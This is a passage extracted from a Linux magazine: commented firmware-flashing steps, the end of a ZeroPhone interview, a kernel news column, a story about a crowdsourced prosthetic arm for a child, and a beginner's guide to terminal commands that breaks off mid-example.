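# Hardware steps (hypothetical device path; needs flashrom, ME Cleaner and
# the chip wired to the programmer – do NOT run blind on real hardware):
#
# flashrom -p linux_spi:dev=/dev/spidev0.0 -r backup1.rom   # read the chip
# flashrom -p linux_spi:dev=/dev/spidev0.0 -r backup2.rom   # read it again
# python me_cleaner.py -S -O cleaned.rom backup1.rom        # neutralise the ME
# flashrom -p linux_spi:dev=/dev/spidev0.0 -w cleaned.rom   # write it back

# Never trust a single dump: compare two reads before modifying anything.
# Stand-in files are created here so the check itself can be run anywhere.
printf 'bios-image' > backup1.rom
printf 'bios-image' > backup2.rom
cmp -s backup1.rom backup2.rom && echo "dumps match"
```

The double-read-and-compare step matters because a loose clip or wrong SPI speed silently produces a corrupt dump, and flashing a corrupt image back bricks the machine.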
Above With access to a
Pick&Place machine at his local
hackerspace, Picugins will be able
to automatically pre-solder some
parts of the kit
What do you think of Purism’s Librem phone?
I find it extraordinarily important, and I believe this
project, if successful, is going to be a turning point
in the history of open source phones. How I see it is that
we’re voting for our ideals with our money, and if we
succeed, it’s going to make other companies listen
to us and understand what we care about – even if
a tiny bit. Furthermore, ZeroPhone, postmarketOS
( and Purism Librem
( are going to have a big overlap in
software, reducing effort duplication and therefore
increasing quality – and I’m sure there has been
sufficient evidence that software quality can make
or break any open source project.
I believe we can make a lot of changes in this
field. Purism is making really modern hardware and
they do need a lot of money to accomplish that.
PostmarketOS is taking old phones and giving them
a new life with Linux, and I’m taking these accessible
single-board computers and making them into
phones and hardware hacking kits.
To learn more about the ZeroPhone project and
possibly get involved, head to the main project page
( and its GitHub repository
Your source of Linux news & views
The kernel column
Jon Masters summarises the latest happenings in the Linux kernel
community, as Linux 4.14-rc3 is released, and ongoing development continues
Linus Torvalds announced 4.14-rc3
(release candidate 3) noting that 4.14
has, so far, been a “somewhat painful
release”. He attributes this to “the fact
that it’s meant to be an LTS [Long Term Support]
release”. This means that 4.14 will receive ‘stable’
backported updates (in 4.14.z updates, such as
4.14.1, 4.14.2 and so on) under the maintenance
of Greg Kroah-Hartman (Greg K-H). Greg picks
a new LTS kernel periodically and provides fixes
and security patches as a means to enable
those who are building certain projects to have a
kernel source that lives longer than the usual few
months. This often includes Android or other major
projects that have various channels through which
coordination can occur to choose an LTS kernel for
a release.
The 4.14-rc1 actually came out a day earlier than
typical due to the US Labor Day holiday. As Linus
noted, “I realise that if I had waited until tomorrow,
I would also have hit the 26th anniversary of the
Linux-0.01 release”. The new kernel will feature
a number of exciting core memory additions
visible to x86 users (especially laptops, desktops
and servers), including support for 5-level page
tables (enabling use of many petabytes of system
memory), Address Space ID (ASID) support similar
to that already long available on ARM systems, and
AMD’s ‘Secure Memory Encryption’ (SME). Other
features include support for Heterogeneous Memory
Management (HMM), intended to allow SVM (shared
virtual memory) use cases in which devices such as
GPUs and FPGAs share memory with application
processes seamlessly, and the removal of the legacy
firmware files that used to ship with the kernel (all
distros have long since migrated to shipping the
‘linux-firmware’ standalone package).
With the release of the 4.14 RC kernels came
the closing of the ‘merge window’ (a period of
time during which disruptive changes are allowed)
and we are now well and truly into the phase
of stabilisation that follows. If the crystal balls
function correctly, 4.14 final should be out right
around next issue. Thorsten Leemhuis followed up
with his usual ‘Reported regressions’ summary for
Jon Masters
is a Linux-kernel hacker who has
been working on Linux for more
than 22 years, since he first
attended university at the age
of 13. Jon lives in Cambridge,
Massachusetts, and works for
a large enterprise Linux vendor,
where he is driving the creation
of standards for energy-efficient ARM-powered servers.
4.14 RCs, which included a few reports of scheduling
stalls after boot.
Six-year LTS kernel
One of the more interesting announcements to
come out of the latest Linaro Connect conference
was that the Linux LTS (Long Term Support) kernel
would be getting a longer life cycle going forward.
Traditionally, LTS kernel candidates were chosen
by Greg K-H every couple of years, usually in
collaboration with various industry players such as
Google, who then use the LTS as a basis for their
next Android kernel. The upstream LTS feeds into an
Android common tree that then feeds into vendor
kernel trees maintained by the various mobile SoC
(system-on-chip) manufacturers, and on into the
kernel trees for specific third-party devices (such as
phone handsets).
The whole process is contrived, and usually
results in device kernels that are years out of date,
to the point of reaching end of life soon after the
devices they support hit the market. Needless to
say, this is a frustration for customers (and open
source developers working on AOSP, the Android
Open Source Project), as well as Google itself. Apple
has often received high praise for getting all of its
older devices quickly updated with new OS releases,
but this is harder for an OS like Android that targets
many more devices from many independent vendors.
Hence Google has been working with community
members like Greg K-H on a project known as
‘Treble’, which apparently includes leveraging a
longer LTS cycle that can provide a stable kernel for
multi-year (e.g. handset) projects that need updates.
As Ars Technica reported after the announcement,
the longer LTS cycle isn’t solely for the benefit of
Android, but instead will also benefit some of the
mainstream Linux distributions, those building
devices or needing a kernel that has some level
of community maintenance. The ‘Projected EOL’
(end of life) for the older 4.4 kernel release used by
currently shipping Android devices has already been
updated on the website to ‘Feb, 2022’.
As Linus noted, 4.14 is apparently to be another
LTS candidate kernel, which Greg later confirmed
on his blog, “unless it really is a horrid release
and has major problems”.
Adventures in OOM, RISC-V and SMB
RISC-V is a modern, royalty free, fully open source
computer architecture that was developed as an
offshoot of earlier research at the University of
California, Berkeley (UCB), and is now backed by
both a growing online community and a non-profit
foundation. RISC-V is available as a specification
as well as software models (QEMU) that implement
it, hardware design source code (Verilog) that can
be used to ‘synthesize’ logic into FPGAs (field-programmable gate arrays) in lieu of real chips and
in the form of actual real integrated circuits from a
number of firms. A startup called SiFive is working on
many aspects, including low-cost development kits.
Palmer Dabbelt recently posted version 9 of
the core patches needed to enable Linux kernel
support for RISC-V and these passed the review of
Arnd Bergmann, who developed the ‘asm-generic’
reference used for new arch ports and who serves
as the unofficial gatekeeper to new architecture
merging. If things go according to plan, RISC-V will
be enabled upstream in Linux 4.15.
OpenRISC patch
Not to be outdone, the (older) OpenRISC project
posted a 13-part patch series enabling SMP
support for the cleaned-up latest revision of
its architecture. Stafford Horne’s patches
are interesting because they include a detailed
discussion of the memory ordering semantics for
OpenRISC as well as the testing methodologies
used to ensure that they got it right. A lot of effort
has recently gone into formal analysis of memory
models used by modern computer architectures,
an otherwise extremely dry and arcane topic, and
consequently one that programmers often fail to
understand. Paul McKenney’s free open source book
Is Parallel Programming Hard, And, If So, What Can
You Do About It? is one of the best resources, and he
is actively involved.
Work is ongoing to teach the Linux cgroups code
about how to better handle OOM (out-of-memory)
conditions. Today, the Linux ‘OOM Killer’ (yes, that
is its real name) will run whenever the system is
running low on available RAM and has already
exhausted other options (such as ‘swapping’ unused
application data out to disk, an action formally
known as ‘paging’). The OOM killer has some limited
logic (such as ‘don’t kill the init process’) that tries to
prevent it wedging the system, but otherwise it has
free rein to kill any process it deems to be a memory
hog. The container work aims to allow this to be
constrained to prioritise killing processes within
a specific container or collection of containers in
preference to other more critical system tasks.
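The per-process bookkeeping behind this behaviour is already visible from userspace through the standard procfs interface, and it gives a feel for how the cgroup work can steer the killer's choices:

```shell
# Every process has an OOM 'badness' score the kernel consults when memory
# runs out, plus a user-tunable adjustment in the range -1000 to 1000.
cat /proc/self/oom_score       # current badness score of this shell
cat /proc/self/oom_score_adj   # the adjustment, 0 by default

# Raising the adjustment (allowed without root) marks a process as a
# preferred victim; -1000 exempts it entirely, but lowering the value
# below where it started needs privileges.
echo 500 > /proc/self/oom_score_adj
cat /proc/self/oom_score_adj
```

Daemons such as sshd routinely exempt themselves this way, which is the same prioritisation idea the container work generalises to whole groups of processes.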
Microsoft has continued its work on cleaning up
the Linux kernel SMB (more formally known as CIFS
– Common Internet File System) support for talking
to Windows PCs, both with new support for extended
attributes in Linux 4.13, as well as a developmental
patch series enabling RDMA (remote direct memory
access) using ‘SMB Direct’ for low-latency, high-throughput remote file copying between Linux and
Microsoft Windows network shares.
Linux 4.14 brings another security enhancement
from Kees Cook of the Google security team. Kees
has been working on kernel security for many years.
His latest contribution enables structure layout
randomisation for kernel data structures, making it
far harder to exploit security bugs by virtue of adding
an unpredictability to the in-memory placement
of critical kernel data that might be needed in a
classical ‘buffer overflow’ attack. He achieves this
through a new GCC plug-in called ‘randstruct’ that
adds a level of randomness to structure layout
during kernel compilation. Kees takes care to avoid
randomising certain core structures, such as those
touched by very low-level assembly code – for
example, a process’s thread_info.
Lorelei’s story
How a five-year-old crowdsourced a robotic prosthetic (with help
from her family and a whole lot of friendly strangers)
is a social
and the founder
of Dev4x, an
open innovation
A father and
daughter team
crowdsourced the
design of a robotic
prosthetic arm and
built one for the
daughter, whose
shoulder and left
arm had been
paralysed by a
rare condition.
Who inspires
Bodo says his work
at Dev4X has been
influenced by two
individuals: one
is former award-winning journalist
turned author
and government
advisor Charles
Leadbeater, who
evangelises social
the other is Clay
Shirky (
described by TED
founder, Chris
Anderson as a
“prominent thinker
on the social
and economic
effects of internet
Acute flaccid myelitis (AFM) is a rare
condition that affects the nervous system
and has about a 2% recovery rate. The
starkness of a medical statistic like this is
brutal, and even more so when it relates to the health of
your own children, but this was what Bodo Hoenen and
his family were facing in the summer of 2016 when their
five-year-old daughter, Lorelei, was diagnosed with AFM.
The condition particularly affects the spinal column and
in Lorelei’s case it had paralysed her left shoulder and left
arm. “The prognosis was that the only thing that would
help was occupational therapy and physiotherapy,” says
Hoenen, “but looking at the results, back then, there were
only two kids that had had any significant recovery…”
Hope was needed and it was sparked by a project the
family saw in the hospital: “Researchers were strapping
on an exoskeleton suit to paraplegic individuals and
providing them the biofeedback with the suit,” recalls
Hoenen. “They also provided visual feedback by adding
a VR headset showing them the actual movement of the
arms. With the headset, you would see yourself walking
and then feel your body walking as the exoskeleton suit
was moving your body and this would force the brain to
think ‘Okay, I’m going to walk now’ and they would pick
up those signals from the brain and translate them into
messages to control the exosuit and VR.”
After consulting specialists, Hoenen theorised that
instead of hooking sensors to the brain they needed to
hook sensors directly to the biceps muscle in Lorelei’s
arm: “We knew there were at least very weak signals
going to the muscle and we were hoping to pick those up
and hoping that forcing her to continue sending signals
to her muscles would help that rehabilitation process.”
Hoenen knew that probably the best way to do this was
to build some kind of robotic prosthetic arm, but he had a
problem: he had no idea how to do it. That’s when he and
Lorelei decided to ask the world. “We decided to leverage
the collective intelligence of everyone around us,” says
Hoenen. So, after sifting through all the information they
Above The premise was simple: help rehabilitate Lorelei’s arm
by using sensors to pick up muscle signals and assist the arm to
move up and down inside a sleeve powered by an actuator
could find and talking to other parents with children that
had AFM, Bodo and Lorelei got to work with a simple first
design; they wanted to 3D-print the braces and somehow
acquire an actuator motor to help pull the arm up and
down. But before they got too far into the project, they
decided to record some videos to ask experts for help.
The response was “pleasantly surprising”, says
Hoenen. Within a couple of weeks they’d had Actuonix
( donating actuators while, among
many helpers, they’d received assistance from experts
in battery tech and electronics from South Africa and
Germany respectively, and had a full scan of Lorelei’s
arm done. It wasn’t long before a prototype was made,
followed by a 3D-printed sleeve in PLA.
Signal problems
However, the biggest issue they faced was picking up the
muscle signal from Lorelei’s arm. They discovered that it
was very difficult to filter and normalise the signal and
set a threshold that triggered the actuator. Hoenen found
there was very little difference in the signal between
when her arm was at rest or active. As they tried to set
a threshold, they also noticed that the actuator could
be triggered by a finger twitch or even Lorelei’s heart, so
they put out another video asking for help.
Hoenen pitched the idea that the raw signal could
be run through machine learning or pattern recognition
software to track down a unique signal. Soon after
posting their video, they came across a firm called Coapt
that uses pattern recognition software to help amputees
use prosthetic limbs. The company has a proprietary
system that uses 17 sensors to track the muscle
signals. The software translates the signals it finds into
corresponding movements on a virtual arm (pictured, top
right). Coapt gave the family an evaluation unit to enable
Lorelei to practise and pick up the arm signals, which
meant Hoenen could finally create a working model.
While some manufacturers were incredibly generous,
Hoenen says he encountered a surprising amount of
negativity from others: “A lot of them kept mentioning
‘is this FDA approved?’ [...] From my perspective, I don’t
care. This is about my daughter, I want this solution to
work. This stuff that you’ve got costs $50,000. I just can’t
afford that and the technology that you have isn’t all that
clever, so why don’t we open-source this and expedite the
Top The project is hoping to create an open source equivalent to
the Coapt system Above Bodo and his daughter recorded video
guidance and open-sourced all their documentation to help other
parents facing the same illness
innovation that happens with what we’ve got and this will
create a better world for all of us including your business
model?” Unfortunately, many medical manufacturers
aren’t willing to even consider experimenting with
open models yet. “Open innovation drives innovation
exponentially [compared to] closed, but they failed to
really grasp that,” says Hoenen.
In January of this year, Lorelei came up to her parents
and said: "Hey look what I can do" and was able to move
her arm up and down unassisted. Since then she hasn’t
needed to use the prosthetic and while Hoenen says
it’s not something he wants to take further himself,
he’s helping other parents and trying to tackle “some
of the core challenges still to overcome.” These include
developing bridge software between a system of 17
electrodes and the device, the Raspberry Pi in this
instance, and getting the correct build for the arm sleeve
that houses the electrodes.
Talking about the experience, Hoenen is careful to
downplay the technology. He’s also pragmatic over whether
the arm made that much of a difference to Lorelei’s
recovery: “At the moment, we only have a sample size of
one,” he concedes. At Medicine X Stanford in September,
Hoenen preferred to describe the experience as a story
of “tangible hope, where we would have been spectators
without this project”. However, other parents who have
children diagnosed with AFM are using the project to build
robotic prosthetics and challenging that 2% recovery rate.
Bodo and Lorelei's project is documented and open-sourced on with videos
of the journey, guides for building the arm itself and more
details of the key remaining challenges.
Master the terminal
Unlock the power of the terminal with Neil Bothwick's 12-page guide to many
of the most useful commands and handy tips and tricks to use in the shell
Terminal techniques

• File management, p22
Learn the basics of working with files and directories – nothing too exciting, but you need this before you move on.

• Networking, p23
A selection of commands for working with your network, gathering information on it and making use of it.

• Services and logging, p24
Discover the myriad of programs that run automatically at startup, and the information they are writing to your logs.

• File formats, p25
There are so many different file formats for each type of content; here we look at ways to convert between them.

• Process control, p26
Learn how to find out about the various processes (programs) running on your computer and how to control them.

• Package management, p27
Add and remove software as well as gather details about the software that is already installed on your computer.

• Work with the shell, p28
Learn some of the secrets that make working with the shell faster and easier, especially those that save on typing!

• File systems, p29
Hard disks and USB sticks may look different, but are often handled similarly.
• System info & more, p30-31
Discover the secrets of the insides of your computer without taking a screwdriver to it, plus some great tips and commands.

These days, in theory, there is no necessity to use the command line to run and maintain a Linux system: there are so many graphical tools available for most tasks. But when did we start doing only those things we absolutely had to? The command line provides an alternative environment to the typical desktop GUI, with its own set of pros and cons. The main advantage is that if you know what you are doing, many tasks can be accomplished more efficiently in the command line. That’s just for single tasks; if you want to do something to ten files in a GUI it will often take ten times as long, compared with an extra couple of seconds on the command line. Another time the shell is important is when working on a remote computer over a network connection.

The key phrase in the previous paragraph is ‘if you know what you are doing’. With a GUI you can usually hunt around the buttons and menus until you find something that does what you want; the command line requires some prior knowledge. None of us was born with that, and we all continue to learn, so here is a selection of command-line tips to get you started. We have divided them into a number of sections, so you can dip into this later when you have a need for a particular task.

We have covered a lot in this 12-page guide so these are brief introductions that we hope will encourage you to dive into the manual. However, the most difficult part of the command line is knowing which command to use for a particular need, and we certainly cover that. We give examples, but the one thing Linux has never been short of is documentation. Most commands can be run with the --help argument, which generally outputs a brief summary of the available options. For more information, consult the man page. For example, you
can view the documentation for the mount
command with man mount.
While it used to be commonplace to
switch to the root user with su, this is
not usually advisable now. As the saying
goes ‘with great power comes great
responsibility’, which, roughly translated,
means ‘you can break things in the shell
but major destruction requires root
permissions’. So use sudo to run commands
as root, but only when you need to.
One of the reasons the terminal is a faster
environment is that you don’t get bothered
with ‘are you sure’ questions. The system
assumes you know what you are doing.
Many commands come with a --pretend or
--dry-run option (see --help for the exact
argument) that shows you what a command
will do without actually doing it. Remember,
a computer does what you tell it to do, not
what you want it to do.
That's the scary bit out of the way.
Terminal commands are fast, efficient and
well documented, and offer many benefits
over their GUI alternatives. We are not
suggesting you ditch the GUI altogether,
but after experimenting with some of the
examples here, we hope you will find that
you are able to pick the best environment
for each task.
Master the terminal
File management
Learn the basics of working with files
>_01 Listing files
ls -l Photos
Lists the contents of the specified directory, or the current one if none is
given. The -l option enables long format with extra information. Files are
sorted alphabetically; use -t to sort by date/time and -S to sort by size. -r
reverses the sort order.

Moving a file
mv file1 file2
Moves, or renames, file1 to file2. If file2
is a directory, it moves file1 into it. Note that file1
can also be a directory. Add -i or -n to prevent it
overwriting files of the same name.

Deleting files
rm file1 file2...
Deletes the given files – be very careful when using
this with wildcards. If in doubt, add the -i option to
ask for confirmation. You cannot remove directories
with rm unless you add the -r option, with -f to skip
the prompts – be careful with this!
Pipe down
Some of these
produce a lot of
output; pipe them
to a pager to be
able to read it all.
For example:
$ tree ~ | less
Changing directory
cd /some/path
The cd command changes the current directory to the
given path, which may be relative or absolute. When run
with no arguments, it changes to your home directory.
To go back to the previous directory, use cd -. To see
where you are now, run pwd.

Creating directories
mkdir ~/dir1/subdir1
Creates subdir1 inside dir1 in your home directory.
This will fail if ~/dir1 does not exist or if subdir1
does exist. To avoid such errors and create a
hierarchy of directories in one go, add the -p option.

A more structured listing
tree ~
Shows the contents of your home directory (~ is a
shortcut for home) in a tree layout. This makes it easy
to see the relationship of files, but can get very long.
Use -L 3, for example, to restrict tree to only three
levels of directories.

Copying a file
cp file1 file2
Copies file1 to file2; if file2 is a directory, file1 is copied
into it. The -p switch preserves timestamps and
permissions, otherwise file2 will have the current time.
If file1 is a directory, use the -r option, or -a which
combines -r and -p.

Changing file ownerships…
chown user:group files
Changes the ownership of the given files to that
user and group. If you omit the group, only the user
is changed. If you include the : but not the group,
the user's default group is used. You normally need
to be root to run this.

…and permissions
chmod a+r files
Sets the permissions of the files; a+r means set
the read flag (+r) for all users, leaving all other flags
unchanged. You can also use numeric modes; the
man page explains all the choices. You need to own
the file, or be root, to change its permissions.
Matching directories
rsync -a dir1/ dir2/
Syncs the contents of two directories. All files in
dir1 but not in dir2 (or different there) are copied.
To remove files from dir2 not in dir1, add --delete.
Add -n to see what will be done without doing it.
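To see several of these commands working together, here is a quick sketch you can paste into a terminal. It runs inside a throwaway directory from mktemp, and all the file and directory names are just examples:

```shell
# A quick tour of the file-management commands above,
# run safely inside a throwaway directory.
cd "$(mktemp -d)"
mkdir -p dir1/subdir1        # -p creates the whole hierarchy at once
echo "hello" > file1
cp -p file1 file2            # copy, preserving timestamp and permissions
mv file2 dir1/               # move the copy into dir1
chmod a+r file1              # make file1 readable by everyone
ls dir1                      # lists file2 and subdir1
rm dir1/file2                # delete the copy again
```

Because everything happens under mktemp -d, you can experiment freely without touching your real files.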
Commands for working with the network
What is your computer called?
Find your computer’s network name
with hostname; add -f to get the full name including
the domain, or -d for just the domain. To see your
computer’s IP address, run it with -i.
List network information
ip addr show
The ip command is the successor to the venerable
ifconfig. Both commands can be used to show
information about your network interfaces, including
IP address, hardware address, status and more
arcane statistics.
Check your connection
>_17 Log in remotely
ssh user@hostname
SSH, or Secure Shell, opens a shell session on a remote computer. If you
don’t specify the user, your current username is used. The password it
asks for is that of the user on the remote computer. You can also add a
command to the end of the line, which will be run on the remote computer.
Rsync again
rsync user@hostname:dir3/ dir4/
We saw rsync on the previous page, but it can also be
used to synchronise with a remote computer. In such a
case it automatically uses SSH to handle the transfer.
As with scp, you can also copy from local to remote or
the other way.
ping hostname
Tests the state of your connection to the given host.
The numbers it returns are the round-trip time for small
data packets. If it fails to communicate, it may be that
your network is down, the remote host is down or there
is a DNS problem. Time to start digging.
Send email from the command line
mail -s "Test mail" me@example.com <file.txt
You can quickly email information from the command
line. The -s option sets the subject, which must be
quoted if it contains spaces. The body of the email is
read from standard input, in this case from a file.

Seek help
Most commands
can be run with
--help as their
only argument,
to give a brief
reminder of the
available options.
Look up an address
dig hostname
This command queries your default name servers for
the IP address of the hostname you give it. You can also
tell it to use a different name server, such as Google's,
like this: dig @8.8.8.8 hostname. An alternative
program for this is nslookup.
Scan for wireless networks
iwlist wlan0 scan
The iwlist command finds information about wireless
networks in range, such as signal strength and whether
they are encrypted. If you want more information on the
network to which you are currently connected, use the
iwconfig command.
Copy to another computer
scp file user@hostname:/some/path
This uses SSH to copy a file to the remote computer.
If the remote path starts with a /, it is absolute,
otherwise it is relative to the remote user's home
directory. You can reverse the arguments to copy a
remote file to the local system.
>_20 Share files easily
python3 -m http.server
This runs a web server based at the current directory on port
8000. There’s no real security, but it is a quick and easy way
of sharing files between computers on your local network,
especially if the target device or user can’t use a terminal.
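As a sketch of how you might script this – the port number, bind address and file name here are arbitrary choices for the demo, not defaults:

```shell
# Serve a throwaway directory in the background, fetch a file
# from it over HTTP, then shut the server down again.
cd "$(mktemp -d)"
echo "hello from the server" > greeting.txt
python3 -m http.server 8123 --bind 127.0.0.1 >/dev/null 2>&1 &
srv=$!
sleep 1        # give the server a moment to start listening
python3 -c 'import urllib.request; print(urllib.request.urlopen("http://127.0.0.1:8123/greeting.txt").read().decode(), end="")'
kill "$srv"
```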
Master the terminal
Services and logging
Work with background programs and information
Add your user
to the systemd-journal,
adm or wheel group
to be able
to read the
system journal
without sudo.
Starting and stopping services
Your computer runs many services,
also known as daemons, in the background. On distros
using the older SysVInit service management, these are
controlled by scripts in /etc/init.d, so you would start
Apache with:
/etc/init.d/apache start
Service status
As well as the start example given
above, and the corresponding stop, some service
scripts also take a status option that tells you whether
the service is running or not.
Auto-starting services
With SysVInit you create a symlink from
the init script to the /etc/rc directory corresponding to
your default runlevel to have the service start at boot.
Systemd users can run systemctl enable apache2.
service to do this, and disable to reverse it.
Log watching
Many programs write to the system log –
see what's going on in real time by watching it. Use tail
-f on the system log file, usually /var/log/messages:
tail -f /var/log/messages
Services systemd style
Systemd uses the systemctl command
to manage services, so you can start one with
something like:
systemctl start apache2.service
There are corresponding stop, restart and status
commands, which all do exactly what they say.
Listing services
SysVInit users can simply use ls
/etc/init.d, while systemd users can use systemctl
list-units to see active services and systemctl
list-unit-files to see all available services.
Log watching – systemd style
Systemd uses the journalctl command
to work with the system logs:
journalctl -f
You may have to use sudo to see all system events.
Working with system logs
Looking for trouble
Systemd’s journalctl
makes it easy to look for certain events. Use
this after rebooting from a kernel upgrade:
journalctl -b -p err
-b shows only events since last reboot; -p
err shows events marked as error or worse.
Filtering the logs
Watching the log in real time
gives a lot of irrelevant output, so use grep
to keep it informative. For example, if you
want to see what happens when you plug in
a USB device, run:
tail -f /var/log/messages | grep -i
-e usb -e sd

Add your own entries to
the system log
You can do this by using logger, e.g.:
logger I now want to use the
command line more often!
The message above will be added to
various system log files in /var/log.
File formats
Convert files from one format to another
Converting document files
Office files
LibreOffice can run on the
command line (with the GUI not running) to
convert between file types. For example:
loffice --headless --convert-to
xlsx spreadsheet.ods
loffice --headless --convert-to
odt letter.doc
Extract images from a
PDF file
pdfimages can extract images embedded
in PDF documents; pdfimages -png
somefile.pdf someimages will extract all
the images and write each to a separate
file, someimages-nnn.png. Use -list
to list details of the images rather than
extracting them.
Image conversion
ImageMagick's convert command is
used for this, and can even determine file types from
the filename. For example:
convert photo.jpg photo.png
As you'd expect, this converts an image from JPG to PNG.
Resizing images
ImageMagick does it again!
convert photo.jpg -resize 200x200 photo.png
convert photo.jpg -resize 25% -quality 50%
The first command resizes the image to fit in a box
of the given size and converts it to PNG. The second
reduces both the size and quality of a JPEG image.
Video container conversion
Video formats are complex, but
sometimes you just want to change the container
format to something you can watch on your phone. One
of the main programs for video conversion is ffmpeg.
ffmpeg -i video.mkv -codec copy video.mp4
This converts the file while keeping the contents
Convert man pages
Man pages are written in
GROFF, an unusual format. You can convert
to PostScript with man -t and then pipe it
to your printer or a more readable format:
man -t someprog | lpr
man -t someprog | ps2ascii
unchanged, so it is very fast. The order of arguments is
important as they are applied to the next file on the
command line, so -codec must be after the input file.
Audio conversion
It's easy to convert Ogg Vorbis files
to MP3 using ogg2mp3, probably already installed.
To convert all the files in the current directory, use:
See images
If you are in an X
terminal, you can
view images with
the ImageMagick
command that's
called display.
ogg2mp3 --bitrate 256 .
Text files
Use dos2unix to convert a text file from
a Windows-using friend, then use unix2dos before
sending the file back to them.
Convert to plain text
Commands like pdftotext and
html2text exist to extract the plain text from a
formatted document, such as a PDF or HTML file. You
may need to play with the options; some PDF layouts
require the -layout option to keep the text readable.
Identify media files
Mplayer comes with the midentify
command, which gives all sorts of useful information
about the contents of a file, like length in seconds
and video resolution, along with details of codecs
and bitrates.
Master the terminal
Process control
View and manage running programs and processes
Kill a GUI program
You can kill a GUI
program from
an X terminal
with xkill. Run
the command
and click on the
window that you
want to kill.
List running processes
ps aux
This lists all processes running on your computer – you
may be surprised at the number. This sort of command
really needs to be piped to a pager or grep to find what
you are looking for.
Show resource users
Run top to see a list of processes
sorted by CPU usage, along with overall stats on
processor and memory usage. The results are sorted
by CPU usage by default, but you can use the command
keys to sort by a different criterion – press H to see the
many options.
Tell a program to reload its config
Some programs notice when you modify
their configuration files; others only take note of the
file when they start. In the latter case, you can usually
employ kill or killall to send the HUP signal, which
tells them to reload:
kill -HUP 12345
Who opened that file
If you get an error saying that you
cannot delete or modify a ile because it is open, you
can see which processes have opened which iles with
lsof. As with many of these commands, the output
is usually surprisingly long, but grep is your friend in
inding the culprit:
lsof | grep someile
The fuser command can also be used for this.
Kill a process
Use kill followed by a process number,
gained from ps or top, to send a TERM command to it.
This tells the process to shut down cleanly. If it refuses
to die, use the -KILL option.
kill -KILL 12345
Kill a process by name
killall works like kill except it takes
a program’s name instead of a process number. This
means it will kill all running programs with that name,
>_45 Who started
what process?
The output from ps shows many processes
running. To see how they were started, run
pstree, which lists the processes in a tree
so you can see the parent process of each
running program.
Suspend a program
So you start a program in the shell, then
decide you need to do something else. Press Ctrl+Z to
suspend the running program, do what you want and
run either fg or bg to restart it. The former restarts
as before while the latter continues running it in the
background, returning you to the command prompt.
Find a program’s PID
Every process has a unique ID, like the
one we passed to kill earlier. You can find the PID of a
running process with pgrep programname. This returns
just a list of PIDs, which is ideal for scripting. If you
have several copies of a program running, however, you
can see more detail by adding -a to see the
full command line for each PID. You can also use -f to
match on the full command line, useful for finding the
PID of a script.
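Here is a small, safe way to try this out – we start a disposable sleep job, find it with pgrep -f, then clean up:

```shell
# Start a throwaway background job and find its PID by matching
# the full command line with pgrep -f.
sleep 300 &
bgpid=$!
pgrep -f 'sleep 300' | grep -qx "$bgpid" && echo "pgrep found PID $bgpid"
kill "$bgpid"    # tidy up the background job
```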
Look in /proc
The /proc virtual directory contains a
wealth of system information, including a directory for
each process by PID. Some of the information in here
is pretty esoteric, but there is some basic stuff too.
/proc/PID/cmdline contains the full command
invocation, while /proc/PID/task/PID/children lists the
PIDs of the processes it launched.
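You can poke at your own shell's entry without any risk – $$ expands to the shell's PID. Note that cmdline is NUL-separated, so we translate the separators to spaces:

```shell
# Inspect this shell's own entry under /proc.
tr '\0' ' ' < /proc/$$/cmdline; echo      # the command line that started it
awk '/^PPid:/ {print "parent PID:", $2}' /proc/$$/status
```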
Package management
Install, list and remove software on your computer
Update packages list
apt-get update
When using the APT package manager, the update
command should be run before doing anything
else. It syncs the local list of available packages
with what is available on the servers.
Upgrade packages
apt-get upgrade
A similar-looking command with a very different
purpose, it upgrades all installed packages to the
latest available. It will tell you what it is going to
do and ask for confirmation, so check the list for
any obvious gotchas before telling it to proceed.
Install new packages
apt-get install package1
This installs the packages that you give it.
Additionally, it first checks whether any other
packages are needed by the software that you
want to install (dependencies) and installs them
too. Replace install with remove to remove
packages. With most apt-get commands, you can
add -s to see what would be done without actually
installing anything.
sudo is your friend
Installing and removing software
requires superuser permissions. In olden times
this used the su command, which required users
to know the root password, enabling them to do
anything on the system. The current best practice
is to use sudo, which runs the given command
with root permissions, but only if that user is
authorised to do so. sudo is not all or nothing like
su – it can be configured to allow users to run
specific commands or with specific arguments.
To run a command as root, prefix it with sudo.
RPM update packages
>_56 Table of packages
dpkg --get-selections
A more low-level tool for managing Debian packages is dpkg. It produces a
table of all the packages installed. You can save this to a file or even pipe it
to the mail command to send yourself a copy, which could be useful when
administering a remote computer over SSH.
Install packages on RPM
While the RPM system is still popular, the rpm command
is less so – yum and dnf are replacements for Fedora
and Red Hat, so the command to install a package is
yum install packagename.
Update packages
yum/dnf update
If this command is followed by the name of one or more
packages, those will be updated to the latest versions.
If run with no names, every package installed on your
system will be updated if an update is available.
Cleaning up
Dependencies can hang around after
you have removed the original package. apt-get
autoremove will clean these up on Debian systems;
yum/dnf autoremove does the same for RPM.
rpm -U packagename
RPM is the other main package management
system, used by Fedora and openSUSE. -U
updates the package to its latest version or
installs it if not already on your system.
No need to reinstall
When a new version of your Debian-based
OS is released, instead of downloading an ISO
and reinstalling, you can run apt-get dist-upgrade for
virtually the same effect, without the downtime.
USB boot
GRUB allows
you to easily run
Linux distros
from fast USB-attached storage
just as easily as
when they are on
local disks. This
is ideal if you are
short of space.
Master the terminal
Work with the shell
Important tips to make your work with the shell easier
>_61 Aliases
The alias command creates shortcuts to commands
you often use, or add options as default. For instance, some distros alias
rm to rm -i to give 'are you sure?' prompts when deleting files. You can
see the full list of aliases by running alias on its own. If an alias has been
created with the name of a command, you can use the original command
by prefixing it with \, for example: \rm "somefile".
Go to the start
and end of the
command line
with Ctrl+A and
Ctrl+E. Alt+F
and Alt+B move
forwards and
backwards one word.
TAB completion
Start typing a command and press the
Tab key; your shell will either complete the name or
offer you alternatives if there is more than one match.
The same applies when typing file or directory names:
compare ls /somepath/toavery/longfilename with
ls /soTABtoaTABlonTAB.
Running multiple commands
Separate multiple commands with
semicolons to have them run in sequence.
command1; sleep 5; command2
Detach your shell session
Use screen to start a new shell from
which you can detach and then reconnect, even from a
different computer over SSH. screen is really useful for
long-running tasks, especially when run remotely.
The shell
maintains a list of the
commands you have run, which
can be very handy. Press the
up arrow key to scroll back
through them. Press Ctrl+R
and start typing a command
you used previously and the
shell will show you the most
recent match; press Ctrl+R
again to see the previous one
and so on. Typing !! will run
the previous command, so if
you forgot that it needed root
privileges, just run sudo !!.
Run one command only if another
command succeeds
The && operator looks at the return code of the
first command and only proceeds with the next
command if it exited successfully.
command1 && command2
For the opposite effect, use || – here, the second
command is only run if the first fails.
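The difference between the three separators is easy to demonstrate with the true and false commands, which do nothing but succeed and fail respectively:

```shell
# ';' always runs the next command; '&&' only after success;
# '||' only after failure.
false; echo "semicolon: runs regardless"
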